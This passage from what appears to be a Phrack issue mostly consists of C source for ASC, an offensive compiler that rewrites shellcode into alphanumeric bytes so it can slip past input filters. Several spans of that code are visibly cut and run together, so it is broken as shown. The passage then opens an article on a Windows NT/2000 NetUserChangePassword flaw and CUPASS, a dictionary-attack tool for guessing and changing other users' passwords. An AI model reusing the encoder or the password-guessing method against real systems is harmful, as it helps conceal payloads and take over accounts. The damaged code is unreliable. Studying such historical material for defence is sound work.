fprintf(f,"}\n"); fclose(f); return shellcode->size; } /* print a Sshellcode on the screen */ /* ================================ */ int shellcode_print(struct Sshellcode *shellcode) { char *tmp; if (shellcode==NULL) return -1; if ((tmp=shellcode_malloc_string(shellcode))==NULL) return -1; printf("%s",tmp); free(tmp); return shellcode->size; } /* +------------------------------------------------------------------------+ */ /* | IA32 MACROS DEFINITIONS | */ /* +------------------------------------------------------------------------+ */ /* usefull macro definitions */ /* ========================= */ /* SYNTAX: r=register d=dword w=word b,b1,b2,b3,b4=bytes n=integer index s=Sshellcode */ /* registers */ #define EAX 0 #define EBX 3 #define ECX 1 #define EDX 2 #define ESI 6 #define EDI 7 #define ESP 4 #define EBP 5 #define REGISTERS 8 /* boolean operators (bytes) */ #define XOR(b1,b2) (((b1&~b2)|(~b1&b2))&0xFF) #define NOT(b) ((~b)&0xFF) /* type constructors */ #define DWORD(b1,b2,b3,b4) ((b1<<24)|(b2<<16)|(b3<<8)|b4) /* 0xb1b2b3b4 */ #define WORD(b1,b2) ((b1<<8)|b2) /* 0xb1b2 */ /* type extractors (0=higher 3=lower) */ #define BYTE(d,n) ((d>>(n*8))&0xFF) /* get n(0-3) byte from (d)word d */ /* IA32 alphanumeric instructions definitions */ /* ========================================== */ #define DB(s,b) shellcode_db(s,b); /* dw b1 b2 */ #define DW(s,w) \ DB(s,BYTE(w,0)) \ DB(s,BYTE(w,1)) \ /* dd b1 b2 b3 b4 */ #define DD(s,d) \ DB(s,BYTE(d,0)) \ DB(s,BYTE(d,1)) \ DB(s,BYTE(d,2)) \ DB(s,BYTE(d,3)) \ #define XOR_ECX_DH(s) \ DB(s,'0') \ DB(s,'1') \ #define XOR_ECX_BH(s) \ DB(s,'0') \ DB(s,'9') \ #define XOR_ECX_ESI(s) \ DB(s,'1') \ DB(s,'1') \ #define XOR_ECX_EDI(s) \ DB(s,'1') \ DB(s,'9') \ // xor [base+2*index+disp8],r8 #define XORsib8(s,base,index,disp8,r8) \ DB(s,'0') \ DB(s,(01<<6|r8 <<3|4 )) \ DB(s,(01<<6|index<<3|base)) \ DB(s,disp8) \ // xor [base+2*index+disp8],r32 #define XORsib32(s,base,index,disp8,r32) \ DB(s,'1') \ DB(s,(01<<6|r32 <<3|4 )) \ DB(s,(01<<6|index<<3|base)) \ DB(s,disp8) \ #define XOR_AL(s,b) \ DB(s,'4') \ DB(s,b) \ #define XOR_AX(s,w) \ O16(s) \ DB(s,'5') \ DW(s,w) \ #define XOR_EAX(s,d) \ DB(s,'5') \ DD(s,d) \ #define INCr(s,r) DB(s,('A'-1)|r) #define DECr(s,r) DB(s,'H'|r) #define PUSHr(s,r) DB(s,'P'|r) #define POPr(s,r) DB(s,'X'|r) #define POPAD(s) DB(s,'a') #define O16(s) DB(s,'f') #define PUSHd(s,d) \ DB(s,'h') \ DD(s,d) \ #define PUSHw(s,w) \ O16(s) \ DB(s,'h') \ DW(s,w) \ #define PUSHb(s,b) \ DB(s,'j') \ DB(s,b) \ #define INT3(s) \ DB(s,'\xCC') \ #define CALL_ESP(s) \ DB(s,'\xFF') \ DB(s,'\xD4') \ #define JMP_ESP(s) \ DB(s,'\xFF') \ DB(s,'\xE4') \ #define RET(s) \ DB(s,'\xC3') \ /* +------------------------------------------------------------------------+ */ /* | ALPHANUMERIC MANIPULATIONS FUNCTIONS | */ /* +------------------------------------------------------------------------+ */ #define ALPHANUMERIC_BYTES "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMOPQRSTUVWXYZ" /* return 1 if the byte is alphanumeric */ /* ==================================== */ int alphanumeric_check(unsigned char c) { if (c<'0') return 0; else if (c<='9') return 1; else if (c<'A') return 0; else if (c<='Z') return 1; else if (c<'a') return 0; else if (c<='z') return 1; else return 0; } /* return a random alphanumeric byte */ /* ================================= */ unsigned char alphanumeric_get_byte() { unsigned char *bytes=ALPHANUMERIC_BYTES; return bytes[random_get_int(strlen(bytes))]; } /* return a random alphanumeric byte b (c=CATEGORY_XOR,(b XOR(b XOR c))) */ /* ===================================================================== */ unsigned char alphanumeric_get_complement(unsigned char c) { unsigned char ret; while (1) { ret=alphanumeric_get_byte(); if (alphanumeric_check(XOR(c,ret))) return ret; } } /* +------------------------------------------------------------------------+ */ /* | REGISTERS MANIPULATIONS FUNCTIONS | */ /* +------------------------------------------------------------------------+ */ /* return a random register in a set of allowed registers */ /* ====================================================== */ #define M_EAX (1<pop the return value from the stack */ return ret; } /* initialize registers (reg=shellcode's base address) */ /* =================================================== */ int alphanumeric_initialize_registers(struct Sshellcode *s,unsigned char reg) { unsigned char b[4]; int i; if (s==NULL) return -1; if (reg==EAX) { PUSHr(s,EAX); /* push eax =>address */ reg=alphanumeric_get_register(M_ECX|M_EDX); /* get a random register */ POPr(s,reg); /* pop ecx/edx */ } for (i=0;i<4;i++) b[i]=alphanumeric_get_byte(); /* get a random alphanumeric dword */ PUSHd(s,DWORD(b[0],b[1],b[2],b[3])); /* push '????' */ POPr(s,EAX); /* pop eax */ XOR_EAX(s,DWORD(b[0],b[1],b[2],b[3])); /* xor eax,'????' =>EAX=0 */ DECr(s,EAX); /* dec eax =>EAX=FFFFFFFF */ PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>EAX */ PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>ECX */ PUSHr(s,EAX); /* push eax =>EDX=FFFFFFFF */ PUSHr(s,EAX); /* push eax =>EBX=FFFFFFFF */ PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>ESP */ PUSHr(s,reg); /* push reg =>EBP=address */ PUSHr(s,EAX); /* push eax =>ESI=FFFFFFFF */ PUSHr(s,EAX); /* push eax =>EDI=FFFFFFFF */ POPAD(s); /* popad */ return 0; } /* +------------------------------------------------------------------------+ */ /* | STACK MANIPULATIONS FUNCTIONS | */ /* +------------------------------------------------------------------------+ */ /* return the category of the byte */ /* =============================== */ #define CATEGORY_NULL 0 #define CATEGORY_00 1 #define CATEGORY_FF 2 #define CATEGORY_ALPHA 3 #define CATEGORY_ALPHA_NOT 4 #define CATEGORY_XOR 5 #define CATEGORY_XOR_NOT 6 int alphanumeric_stack_get_category(unsigned char c) { if (c==0) return CATEGORY_00; else if (c==0xFF) return CATEGORY_FF; else if (alphanumeric_check(c)) return CATEGORY_ALPHA; else if (c<0x80) return CATEGORY_XOR; else { /* need a NOT */ c=NOT(c); if (alphanumeric_check(c)) return CATEGORY_ALPHA_NOT; else return CATEGORY_XOR_NOT; } } /* make a NOT on 1,2,3 or 4 bytes on the stack */ /* =========================================== */ int alphanumeric_stack_generate_not(struct Sshellcode *s,int size) { if (s==NULL) return -1; PUSHr(s,ESP); /* push esp */ POPr(s,ECX); /* pop ecx */ switch(size) { case 1: if (alphanumeric_get_register(M_EDX|M_EBX)==EDX) { XOR_ECX_DH(s); /* xor [ecx],dh */ } else { XOR_ECX_BH(s); /* xor [ecx],bh */ } break; case 2: if (alphanumeric_get_register(M_ESI|M_EDI)==ESI) { O16(s);XOR_ECX_ESI(s); /* xor [ecx],si */ } else { O16(s);XOR_ECX_EDI(s); /* xor [ecx],di */ } break; case 3: DECr(s,ECX); /* dec ecx */ case 4: if (alphanumeric_get_register(M_ESI|M_EDI)==ESI) { XOR_ECX_ESI(s); /* xor [ecx],esi */ } else { XOR_ECX_EDI(s); /* xor [ecx],edi */ } break; } return 0; } /* generate 1,2,3 or 4 bytes from a category on the stack */ /* ====================================================== */ #define SB1 b[size-1] #define SB2 b[size-2] #define SB3 b[size-3] #define SB4 b[size-4] int alphanumeric_stack_generate_push(struct Sshellcode *s,int category,unsigned char *bytes,int size) { int reg,i; unsigned char b[4]; unsigned char xSB1,xSB2,xSB3,xSB4; if (s==NULL) return -1; memcpy(b,bytes,4); /* possibly realize a NOT on b[] */ if ((category==CATEGORY_ALPHA_NOT)||(category==CATEGORY_XOR_NOT)) { for (i=0;ir16=0*/ switch(size) { case 1: O16(s);PUSHr(s,reg); /* push r16 */ INCr(s,ESP); /* inc esp */ break; case 2: O16(s);PUSHr(s,reg); /* push r16 */ break; case 3: PUSHr(s,reg); /* push r32 */ INCr(s,ESP); /* inc esp */ break; case 4: PUSHr(s,reg); /* push r32 */ break; } if (category==CATEGORY_00) DECr(s,reg); /* dec r16 =>r16=FFFFFFFF */ break; case CATEGORY_ALPHA: case CATEGORY_ALPHA_NOT: switch(size) { case 1: PUSHw(s,WORD(SB1,alphanumeric_get_byte())); /* push SB1 */ INCr(s,ESP); /* inc esp */ break; case 2: PUSHw(s,WORD(SB1,SB2)); /* push SB1 SB2 */ break; case 3: PUSHd(s,DWORD(SB1,SB2,SB3,alphanumeric_get_byte())); /* push SB1 SB2 SB3 */ INCr(s,ESP); /* inc esp */ break; case 4: PUSHd(s,DWORD(SB1,SB2,SB3,SB4)); /* push SB1 SB2 SB3 SB4 */ break; } break; case CATEGORY_XOR: case CATEGORY_XOR_NOT: switch(size) { case 1: xSB1=alphanumeric_get_complement(SB1); PUSHw(s,WORD(XOR(SB1,xSB1),alphanumeric_get_byte())); /* push ~xSB1 */ O16(s);POPr(s,EAX); /* pop ax */ XOR_AX(s,WORD(xSB1,alphanumeric_get_byte())); /* xor ax,xSB1 =>EAX=SB1 */ O16(s);PUSHr(s,EAX); /* push ax */ INCr(s,ESP); /* inc esp */ break; case 2: xSB1=alphanumeric_get_complement(SB1); xSB2=alphanumeric_get_complement(SB2); PUSHw(s,WORD(XOR(SB1,xSB1),XOR(SB2,xSB2))); /* push ~xSB1 ~xSB2 */ O16(s);POPr(s,EAX); /* pop ax */ XOR_AX(s,WORD(xSB1,xSB2)); /* xor ax,xSB1 xSB2 =>EAX=SB1 SB2 */ O16(s);PUSHr(s,EAX); /* push ax */ break; case 3: xSB1=alphanumeric_get_complement(SB1); xSB2=alphanumeric_get_complement(SB2); xSB3=alphanumeric_get_complement(SB3); PUSHd(s,DWORD(XOR(SB1,xSB1),XOR(SB2,xSB2),XOR(SB3,xSB3),alphanumeric_get_byte())); /* push ~xSB1 ~xSB2 ~xSB3 */ POPr(s,EAX); /* pop eax */ XOR_EAX(s,DWORD(xSB1,xSB2,xSB3,alphanumeric_get_byte())); /* xor eax,xSB1 xSB2 xSB3 =>EAX=SB1 SB2 SB3 */ PUSHr(s,EAX); /* push eax */ INCr(s,ESP); /* inc esp */ break; case 4: xSB1=alphanumeric_get_complement(SB1); xSB2=alphanumeric_get_complement(SB2); xSB3=alphanumeric_get_complement(SB3); xSB4=alphanumeric_get_complement(SB4); PUSHd(s,DWORD(XOR(SB1,xSB1),XOR(SB2,xSB2),XOR(SB3,xSB3),XOR(SB4,xSB4))); /* push ~xSB1 ~xSB2 ~xSB3 ~xSB4 */ POPr(s,EAX); /* pop eax */ XOR_EAX(s,DWORD(xSB1,xSB2,xSB3,xSB4)); /* xor eax,xSB1 xSB2 xSB3 xSB4 =>EAX=SB1 SB2 SB3 SB4 */ PUSHr(s,EAX); /* push eax */ break; } break; } /* possibly realize a NOT on the stack */ if ((category==CATEGORY_ALPHA_NOT)||(category==CATEGORY_XOR_NOT)) alphanumeric_stack_generate_not(s,size); return 0; } /* generate the original shellcode on the stack */ /* ============================================ */ int alphanumeric_stack_generate(struct Sshellcode *output,struct Sshellcode *input) { int category,size,i; if (input==NULL) return -1; if (output==NULL) return -1; i=input->size-1; while (i>=0) { /* loop from the right to the left of our original shellcode */ category=alphanumeric_stack_get_category(input->opcodes[i]); size=1; /* by default, we have 1 byte of the same category */ /* loop until maximum 3 previous bytes are from the same category */ while ((i-size>=0)&&(size<4)&&(alphanumeric_stack_get_category(input->opcodes[i-size])==category)) size++; /* write those bytes on the stack */ alphanumeric_stack_generate_push(output,category,&input->opcodes[i-size+1],size); i-=size; } return 0; } /* +------------------------------------------------------------------------+ */ /* | PATCHES MANIPULATIONS FUNCTIONS | */ /* +------------------------------------------------------------------------+ */ /* return the category of the byte */ /* =============================== */ int alphanumeric_patches_get_category(unsigned char c) { if (alphanumeric_check(c)) return CATEGORY_ALPHA; else if (c<0x80) return CATEGORY_XOR; else { /* need a NOT */ c=NOT(c); if (alphanumeric_check(c)) return CATEGORY_ALPHA_NOT; else return CATEGORY_XOR_NOT; } } /* generate the patches initialization shellcode */ /* ============================================ */ int alphanumeric_patches_generate_initialization(struct Sshellcode *shellcode,int patcher_size,int alpha_begin,int base,unsigned char disp8) { struct Sshellcode *s; int offset; /* real offset for original shellcode to patch */ struct Sshellcode *p_offset; /* offset "shellcode" */ int fill_size; /* size to add to the initialization shellcode to align */ int initialization_size,i; if (shellcode==NULL) return -1; initialization_size=0; while(1) { /* loop until we create a valid initialization shellcode */ s=shellcode_malloc(); fill_size=0; PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>EAX */ PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>ECX */ PUSHr(s,alphanumeric_get_register(M_EDX|M_EBX|M_ESI|M_EDI)); /* push FFFFFFFF =>EDX */ if (base==EBX) { PUSHr(s,EBP); /* push ebp =>EBX */ } else { PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>EBX */ } PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>ESP */ offset=shellcode->size+initialization_size+patcher_size+alpha_begin-disp8; /* calculate the real offset */ /* if the offset is not correct we must modify the size of our initialization shellcode */ if (offset<0) { /* align to have a positive offset */ fill_size=-offset; offset=0; } if (offset&1) { /* align for the 2*ebp */ fill_size++; offset++; } offset/=2; p_offset=shellcode_malloc(); DB(p_offset,BYTE(offset,0)); DB(p_offset,BYTE(offset,1)); DB(p_offset,BYTE(offset,2)); DB(p_offset,BYTE(offset,3)); alphanumeric_stack_generate(s,p_offset); /* push offset => EBP */ shellcode_free(p_offset); PUSHr(s,alphanumeric_get_register(M_EDX|M_EBX|M_ESI|M_EDI)); /* push FFFFFFFF =>ESI */ if (base==EDI) { PUSHr(s,EBP); /* push ebp =>EDI */ } else { PUSHr(s,alphanumeric_get_register(M_REGISTERS)); /* push r32 =>EDI */ } POPAD(s); /* popad */ if (s->size<=initialization_size) break; /* if the offset is good */ initialization_size++; } /* the offset is good */ /* fill to reach the initialization_size value */ while (s->size xor xPB1,~xPB1 */ break; case 2: xPB1=alphanumeric_get_complement(PB1); xPB2=alphanumeric_get_complement(PB2); PUSHw(s,WORD(XOR(PB2,xPB2),XOR(PB1,xPB1))); /* push ~xPB2 ~xPB1 */ O16(s);POPr(s,reg); /* pop reg */ PB1=xPB1; /* modify into the original shellcode */ PB2=xPB2; O16(s);XORsib32(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],reg => xor xPB2 xPB1,~xPB2 ~xPB1 */ break; case 4: xPB1=alphanumeric_get_complement(PB1); xPB2=alphanumeric_get_complement(PB2); xPB3=alphanumeric_get_complement(PB3); xPB4=alphanumeric_get_complement(PB4); PUSHd(s,DWORD(XOR(PB4,xPB4),XOR(PB3,xPB3),XOR(PB2,xPB2),XOR(PB1,xPB1))); /* push ~xPB4 ~xPB3 ~xPB2 ~xPB1 */ POPr(s,reg); /* pop reg */ PB1=xPB1; /* modify into the original shellcode */ PB2=xPB2; PB3=xPB3; PB4=xPB4; XORsib32(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],reg => xor xPB4 xPB3 xPB2 xPB1,~xPB4 ~xPB3 ~xPB2 ~xPB1 */ break; } break; } /* eventually realize a NOT on the shellcode */ if ((category==CATEGORY_ALPHA_NOT)||(category==CATEGORY_XOR_NOT)) { reg=alphanumeric_get_register(M_EDX|M_ESI); switch(size) { case 1: XORsib8(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],dl/dh */ break; case 2: O16(s);XORsib32(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],dx/si */ break; case 4: XORsib32(s,base,EBP,disp8,reg); /* xor [base+2*ebp+disp8],edx/esi */ break; } } return 0; } /* generate the patch and the original shellcode */ /* ============================================= */ int alphanumeric_patches_generate(struct Sshellcode *output,struct Sshellcode *input) { struct Sshellcode *out,*in; /* input and output codes */ struct Sshellcode *best; /* last best shellcode */ struct Sshellcode *patcher; /* patches code */ int alpha_begin,alpha_end; /* offsets of the patchable part */ int base; /* base register */ unsigned char *disp8_begin; /* pointer to the current first disp8 */ unsigned char disp8; int category,size,i,j; if (input==NULL) return -1; if (output==NULL) return -1; /* get the offset of the first and last non alphanumeric bytes */ for (alpha_begin=0;alpha_beginsize;alpha_begin++) { if (!alphanumeric_check(input->opcodes[alpha_begin])) break; } if (alpha_begin>=input->size) { /* if patching is not needed */ shellcode_cat(output,input); return 0; } for (alpha_end=input->size-1;alpha_end>alpha_begin;alpha_end--) { if (!alphanumeric_check(input->opcodes[alpha_end])) break; } base=alphanumeric_get_register(M_EBX|M_EDI); best=shellcode_malloc(); disp8_begin=ALPHANUMERIC_BYTES; while (*disp8_begin!=0) { /* loop for all possible disp8 values */ disp8=*disp8_begin; /* allocate all shellcodes */ out=shellcode_malloc(); shellcode_cpy(out,output); in=shellcode_malloc(); shellcode_cpy(in,input); patcher=shellcode_malloc(); i=alpha_begin; size=0; while (i<=alpha_end) { /* loop into our original shellcode */ /* increment the offset if needed */ for (j=0;jopcodes[i]); size=1; /* by default, we have 1 byte of the same category */ /* loop until maximum 3 next bytes are from the same category */ while ((i+size<=alpha_end)&&(size<4)&&(alphanumeric_patches_get_category(in->opcodes[i+size])==category)) size++; if (size==3) size=2; /* impossible to XOR 3 bytes */ /* patch those bytes */ alphanumeric_patches_generate_xor(patcher,category,&in->opcodes[i],size,base,disp8); i+=size; } alphanumeric_patches_generate_initialization(out,patcher->size,alpha_begin,base,*disp8_begin); /* create a valid initialization shellcode */ shellcode_cat(out,patcher); shellcode_cat(out,in); if ((best->size==0)||(out->sizesize)) shellcode_cpy(best,out); /* if this is a more interesting shellcode, we save it */ /* free all shellcodes and malloc */ shellcode_free(out); shellcode_free(in); shellcode_free(patcher); disp8_begin++; } shellcode_cpy(output,best); shellcode_free(best); return 0; } /******************************************************************************/ /* +------------------------------------------------------------------------+ */ /* | INTERFACE FUNCTIONS | */ /* +------------------------------------------------------------------------+ */ void print_syntax() { fprintf(stderr,"ASC - IA32 Alphanumeric Shellcode Compiler\n"); fprintf(stderr,"==========================================\n"); fprintf(stderr,"SYNTAX : asc [options] \n"); fprintf(stderr,"COMPILATION OPTIONS :\n"); fprintf(stderr," -a[ddress] stack| : address of shellcode (default=stack)\n"); fprintf(stderr," -m[ode] stack|patches : output shellcode build mode (default=patches)\n"); fprintf(stderr," -s[tack] call|jmp|null|ret : method to return to original code on the stack\n"); fprintf(stderr," (default=null)\n"); fprintf(stderr,"DEBUGGING OPTIONS :\n"); fprintf(stderr," -debug-start : breakpoint to start of compiled shellcode\n"); fprintf(stderr," -debug-build-original : breakpoint to building of original shellcode\n"); fprintf(stderr," -debug-build-jump : breakpoint to building of stack jump code\n"); fprintf(stderr," -debug-jump : breakpoint to stack jump\n"); fprintf(stderr," -debug-original : breakpoint to start of original shellcode\n"); fprintf(stderr,"INPUT/OUTPUT OPTIONS :\n"); fprintf(stderr," -c[har] : name of C input array (default=first array)\n"); fprintf(stderr," -f[ormat] bin|c : output file format (default=bin)\n"); fprintf(stderr," -o[utput] : output file name (default=stdout)\n"); fprintf(stderr,"\n"); fprintf(stderr,"ASC 0.9.1 rix@hert.org @2001\n"); exit(1); } void print_error() { perror("Error ASC"); exit(1); }; /* +------------------------------------------------------------------------+ */ /* | MAIN PROGRAM | */ /* +------------------------------------------------------------------------+ */ #define STACK REGISTERS+1 #define INPUT_FORMAT_BIN 0 #define INPUT_FORMAT_C 1 #define OUTPUT_FORMAT_BIN 0 #define OUTPUT_FORMAT_C 1 #define OUTPUT_MODE_STACK 0 #define OUTPUT_MODE_PATCHES 1 #define STACK_MODE_CALL 0 #define STACK_MODE_JMP 1 #define STACK_MODE_NULL 2 #define STACK_MODE_RET 3 int main(int argc, char **argv) { char *input_filename=NULL,*output_filename=NULL; struct Sshellcode *input=NULL,*output=NULL,*stack=NULL; char input_format=INPUT_FORMAT_BIN; char *input_variable=NULL; char address=STACK; char output_format=OUTPUT_FORMAT_BIN; char output_mode=OUTPUT_MODE_PATCHES; char stack_mode=STACK_MODE_NULL; int debug_start=0; int debug_build_original=0; int debug_build_jump=0; int debug_jump=0; int debug_original=0; int ret,l; /* command line parameters definition */ #define SHORT_OPTIONS "a:c:f:m:o:s:" struct option long_options[]={ /* {"name",has_arg,&variable,value} */ {"address",1,NULL,'a'}, {"mode",1,NULL,'m'}, {"stack",1,NULL,'s'}, {"debug-start",0,&debug_start,1}, {"debug-build-original",0,&debug_build_original,1}, {"debug-build-jump",0,&debug_build_jump,1}, {"debug-jump",0,&debug_jump,1}, {"debug-original",0,&debug_original,1}, {"char",1,NULL,'c'}, {"format",1,NULL,'f'}, {"output",1,NULL,'o'}, {0,0,0,0} }; int c; int option_index=0; /* read command line parameters */ opterr=0; while ((c=getopt_long_only(argc,argv,SHORT_OPTIONS,long_options,&option_index))!=-1) { switch (c) { case 'a': if (!strcmp(optarg,"eax")) address=EAX; else if (!strcmp(optarg,"ebx")) address=EBX; else if (!strcmp(optarg,"ecx")) address=ECX; else if (!strcmp(optarg,"edx")) address=EDX; else if (!strcmp(optarg,"esp")) address=ESP; else if (!strcmp(optarg,"ebp")) address=EBP; else if (!strcmp(optarg,"esi")) address=ESI; else if (!strcmp(optarg,"edi")) address=EDI; else if (!strcmp(optarg,"stack")) address=STACK; else print_syntax(); break; case 'c': input_format=INPUT_FORMAT_C; input_variable=optarg; break; case 'f': if (!strcmp(optarg,"bin")) output_format=OUTPUT_FORMAT_BIN; else if (!strcmp(optarg,"c")) output_format=OUTPUT_FORMAT_C; else print_syntax(); break; case 'm': if (!strcmp(optarg,"stack")) output_mode=OUTPUT_MODE_STACK; else if (!strcmp(optarg,"patches")) output_mode=OUTPUT_MODE_PATCHES; else print_syntax(); break; case 'o': output_filename=optarg; break; case 's': output_mode=OUTPUT_MODE_STACK; if (!strcmp(optarg,"call")) stack_mode=STACK_MODE_CALL; else if (!strcmp(optarg,"jmp")) stack_mode=STACK_MODE_JMP; else if (!strcmp(optarg,"null")) stack_mode=STACK_MODE_NULL; else if (!strcmp(optarg,"ret")) stack_mode=STACK_MODE_RET; else print_syntax(); break; case 0: /* long option set variable */ break; case '?': /* error option character */ case ':': /* error option parameter */ default: print_syntax(); } } if (optind+1!=argc) print_syntax(); /* if no input file specified */ input_filename=argv[optind]; /* detect the input file format */ l=strlen(input_filename); if ((l>2)&&(input_filename[l-2]=='.')&&(input_filename[l-1]=='c')) input_format=INPUT_FORMAT_C; random_initialize(); input=shellcode_malloc(); output=shellcode_malloc(); /* read input file */ if (debug_original) INT3(input); fprintf(stderr,"Reading %s ... ",input_filename); switch(input_format) { case INPUT_FORMAT_BIN: ret=shellcode_read_binary(input,input_filename); break; case INPUT_FORMAT_C: ret=shellcode_read_C(input,input_filename,input_variable); break; } if (ret==-1) { fprintf(stderr,"\n"); print_error(); } if (!debug_original) fprintf(stderr,"(%d bytes)\n",input->size); else fprintf(stderr,"(%d bytes)\n",input->size-1); if (debug_start) INT3(output); /* obtain the shellcode address */ if (address==STACK) address=alphanumeric_get_address_stack(output); alphanumeric_initialize_registers(output,address); /* generate the original shellcode */ if (debug_build_original) INT3(output); switch(output_mode) { case OUTPUT_MODE_STACK: alphanumeric_stack_generate(output,input); if (stack_mode!=STACK_MODE_NULL) { /* if jump building needed */ stack=shellcode_malloc(); if (debug_jump) INT3(stack); switch(stack_mode) { case STACK_MODE_CALL: CALL_ESP(stack); /* call esp */ break; case STACK_MODE_JMP: JMP_ESP(stack); /* jmp esp */ break; case STACK_MODE_RET: PUSHr(stack,ESP); /* push esp */ RET(stack); /* ret */ break; } if (debug_build_jump) INT3(output); alphanumeric_patches_generate(output,stack); shellcode_free(stack); } else { /* no jump building needed */ if (debug_jump) INT3(output); } break; case OUTPUT_MODE_PATCHES: alphanumeric_patches_generate(output,input); break; } /* print shellcode to the screen */ fprintf(stderr,"Shellcode (%d bytes):\n",output->size); shellcode_print(output); fclose(stdout); fprintf(stderr,"\n"); /* write input file */ if (output_filename) { fprintf(stderr,"Writing %s ...\n",output_filename); switch(output_format) { case OUTPUT_FORMAT_BIN: ret=shellcode_write_binary(output,output_filename); break; case OUTPUT_FORMAT_C: ret=shellcode_write_C(output,output_filename); break; } if (ret==-1) { shellcode_free(input); shellcode_free(output); print_error(); } } shellcode_free(input); shellcode_free(output); fprintf(stderr,"Done.\n"); } /******************************************************************************/ <--> |EOF|--------------------------------------------------------------------| ==Phrack Inc.== Volume 0x0b, Issue 0x39, Phile #0x10 of 0x12 |=---------=[ CUPASS AND THE NETUSERCHANGEPASSWORD PROBLEM ]=------------=| |=-----------------------------------------------------------------------=| |=-------=[ Doc Holiday / THC ]=----------=| ----| INTRODUCTION Microsoft has a known problem in Windows NT 4, that enables an attacker to change the password of any user under special/default circumstances. The same problem reappeared in Windows 2000 some days ago. The flaw exists in Microsofts implementation of the NetUserChangePassword function. These facts inspired me to write this article and CUPASS, a simple tool that starts a dictionary attack against user accounts. In this article I want to discuss all things worth knowing about the NetUserChangePassword problem. Have fun while reading this article... Doc Holiday /THC ----| THE PASSWORD CHANGE PROTOCOLS As a little background I will tell you something about the possibilites to change a password in a Windows NT/W2K environment. Windows 2000 supports several protocols for changing passwords which are used under different circumstances. These protocols are - NetUserChangePassword protocol (we will call it NUCP) - NetUserSetInfo protocol - Kerberos change-password protocol - Kerberos set-password protocol - LDAP write-password attribute (presumes 128Bit SSL) - XACT-SMB protocol (for LAN Manager compatibility) Because there is a flaw in Microsofts implementation of the NUCP protocol, we will have a deeper look at this one. ----| PROTOCOL ELECTION We can see that there are a lot of protocols for changing passwords in an Microsoft environment. Now I will show in which cases the NUCP is used: case 1 ------ If a user changes his password by pressing CTRL+ALT+DELETE and pressing the "Change Password" button, the NUCP protocol is used, if the target is a domain or the local member server or workstation. If the target is a Kerberos realm, the Kerberos change-password protocol is used instead of NUCP. case 2 ------ If a change password request is initiated from an Windows NT 3.x or NT 4 machine, the NUCP and/or NetUserSetInfo protocols are used. case 3 ------ If a program uses the NUCP method on the Active Directory Services Interface (ADSI), the IaDSUser interface first tries to change the password with the LDAP protocol, and then by using the NUCP method. ----| NUCP FUNCTION CALL At this time we know that a lot of ways exist to change a users password. We also know in which cases NUCP is used. Now we want to have a little look at the function NetUserChangePassword itself. (More detailed information can be found at Microsoft's SDK!) Prototype --------- The prototype of the NetUserChangePassword function is defined in "lmaccess.h", and looks as follows: NET_API_STATUS NET_API_FUNCTION NetUserChangePassword ( IN LPCWSTR domainname OPTIONAL, IN LPCWSTR username OPTIONAL, IN LPCWSTR oldpassword, IN LPCWSTR newpassword ); The parameters are explained consecutively: Parameters ---------- ->domainname ---------- Pointer to a null-terminated Unicode string that specifies the name of a remote server or domain. ->username -------- Pointer to a null-terminated Unicode string that specifies a user name. ->oldpassword ----------- Pointer to a null-terminated Unicode string that specifies the user's old password on the server or domain. ->newpassword ----------- Pointer to a null-terminated Unicode string that specifies the user's new password on the server or domain. Return values ------------- The return values are defined in "LMERR.H" and "WINERROR.H". With a deeper look in this files we can see that if the function was executed with success, the return value is 0 (zero) btw. NERR_Success. The most important error values are: ->ERROR_ACCESS_DENIED (WINERROR.H) -------------------------------- Access is denied ;) If the target is a NT Server/Domain Controller, and the option "User Must Log On in Order to Change Password" is enabled, this error code is the result of CUPASS. The password could not be guessed :( If the target is a W2K domain controller with AD installed, and the EVERYONE group is removed from the group "Pre-Windows 2000 compatible access", than this error code is an result of NUCP. In some cases this means the right password was guessed by CUPASS, but could not be changed because of insufficient permissions on the corresponding AD object. ->ERROR_INVALID_PASSWORD (WINERROR.H) ----------------------------------- The guessed password (oldpassword) was invalid ->ERROR_ACCOUNT_LOCKED_OUT (WINERROR.H) ------------------------------------- The account is locked due to many logon tries. ->ERROR_CANT_ACCESS_DOMAIN_INFO (WINERROR.H) ------------------------------------------ Indicates a Windows NT Server could not be contacted or that objects within the domain are protected such that necessary information could not be retrieved. ->NERR_UserNotFound (LMERR.H) --------------------------- The useraccount could not be found on the given server. ->NERR_NotPrimary (LMERR.H) ------------------------- The operation is only allowed on the PDC. This appears e.g. if you try to change passwords on a BDC. This return values are evaluated by CUPASS. For all others, the numeric value will be shown, and you can simply have a look at this files for the meaning of the errorcode. MORE DETAILS ON NUCP API CALL ----------------------------- The NUCP function is only available on Windows NT and Windows 2000 platforms. As part of the LanMan-API the NUCP function is UNICODE only!!! This makes the programming a little bit harder, but not impossible :) UNICODE on Windows is an topic for itself, and we dont want to talk more about it here. Have a look at Microsofts msdn webpage or Charles Petzolds book about Windows programming, if you are interested in this topic. For a successfull usage of NUCP, you have to link your program with the "Netapi32.lib" library! ----| REQUIRED PERMISSIONS FOR NUCP NUCP is part of the Microsoft network management functions. The management functions consists of different groups like NetFileFunctions, ScheduleFunctions, ServerFunctions, UserFunctions etc. These functions are again splitted in Query Functions and Update Functions. Whilst query functions just allow to query informations, the update functions allow changes on objects. An example for a query function is e.g the NetUserEnum function which provides information about all user accounts on a server. An example for an update function is the NetUserChangePassword function which changes the password of a user account :) Its easy to imagine, that query functions need less permissions than update functions for beeing executed. Lets have a look what permissions are needet: WINDOWS NT ---------- The query functions like NetGroupEnum, NetUserEnum etc. and can be executed by all authenticated users. This includes Anonymous users, if the RestrictAnonymous policy setting allows anonymous access. On a Windows NT member server, workstation or PDC, the NetUserChangePassword function can only be (successfull) executed by Administrators, Account Operators or the user of the account, if the option 'User Must Log On in Order to Change Password' for this user is enabled. If 'User Must Log On in Order to Change Password' is not enabled, a user can change the password of any other user, as long he knows the actual password. WINDOWS 2000 ------------ The query functions like NetGroupEnum, 